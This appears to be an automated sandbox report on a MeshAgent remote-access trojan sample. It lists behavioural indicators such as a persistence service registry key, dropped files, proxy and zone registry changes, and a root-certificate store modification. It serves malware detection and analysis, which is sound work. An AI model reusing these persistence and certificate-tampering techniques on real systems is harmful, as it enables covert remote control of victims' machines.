Malware Analysis Report

2024-10-23 20:19

Sample ID 240924-v87zeswclm
Target 20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch
SHA256 d8ae46b6adb3b8dcaddaab2adaf4337048e29c1ffd1caccbe22612dad8113402
Tags
meshagent backdoor discovery execution persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d8ae46b6adb3b8dcaddaab2adaf4337048e29c1ffd1caccbe22612dad8113402

Threat Level: Known bad

The file 20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch was found to be: Known bad.

Malicious Activity Summary

meshagent backdoor discovery execution persistence rat trojan

MeshAgent

Detects MeshAgent payload

Command and Scripting Interpreter: PowerShell

Sets service image path in registry

Blocklisted process makes network request

Executes dropped EXE

Checks installed software on the system

Drops file in System32 directory

Unsigned PE

Modifies data under HKEY_USERS

Modifies system certificate store

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-24 17:40

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-24 17:40

Reported

2024-09-24 17:43

Platform

win7-20240903-en

Max time kernel

117s

Max time network

118s

Command Line

"C:\Users\Admin\AppData\Local\Temp\20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch.exe

"C:\Users\Admin\AppData\Local\Temp\20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch.exe"

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-09-24 17:40

Reported

2024-09-24 17:43

Platform

win10v2004-20240802-en

Max time kernel

92s

Max time network

145s

Command Line

"C:\Users\Admin\AppData\Local\Temp\20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch.exe"

Signatures

Detects MeshAgent payload

Description Indicator Process Target
N/A N/A N/A N/A

MeshAgent

rat trojan backdoor meshagent

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\naver Service\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\naver\\naver.exe\" --meshServiceName=\"naver Service\"" C:\Users\Admin\AppData\Local\naver\naver.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\naver\naver.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\naver\naver.exe N/A

Checks installed software on the system

discovery

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\dll\msvcrt.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\ucrtbase.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\ntasn1.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\ole32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\Kernel.Appcore.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\exe\MeshService64.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\comctl32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\msvcrt.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\ws2_32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\gdi32full.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\crypt32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\iphlpapi.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\shell32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\shell32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\dll\shcore.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\39D8960339E98ED327D3ACF7EF9C1C329EC27809 C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\gdi32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\gdi32full.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\dbghelp.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\combase.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\DLL\dbgcore.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\DLL\bcrypt.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\Kernel.Appcore.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\shcore.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\msvcrt.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\win32u.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\gdi32full.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\msvcp_win.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\sechost.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\ncrypt.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\ntdll.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\rpcrt4.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\dbghelp.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\bcryptprimitives.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\MeshService64.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\comctl32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\advapi32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\sechost.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\328FC4DCB11193B185AE89ACB02AA01BC7434194 C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\combase.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\bcryptprimitives.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\crypt32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\advapi32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dbghelp.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\DLL\iphlpapi.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\DLL\iphlpapi.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\combase.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\ncrypt.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\bcrypt.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\kernelbase.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\ws2_32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\gdi32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\rpcrt4.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\shell32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\gdiplus.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\Kernel.Appcore.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\kernelbase.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\user32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\sechost.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\gdiplus.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\ntasn1.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Users\Admin\AppData\Local\naver\naver.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Users\Admin\AppData\Local\naver\naver.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Users\Admin\AppData\Local\naver\naver.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133716732718239736" C:\Users\Admin\AppData\Local\naver\naver.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Users\Admin\AppData\Local\naver\naver.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Users\Admin\AppData\Local\naver\naver.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
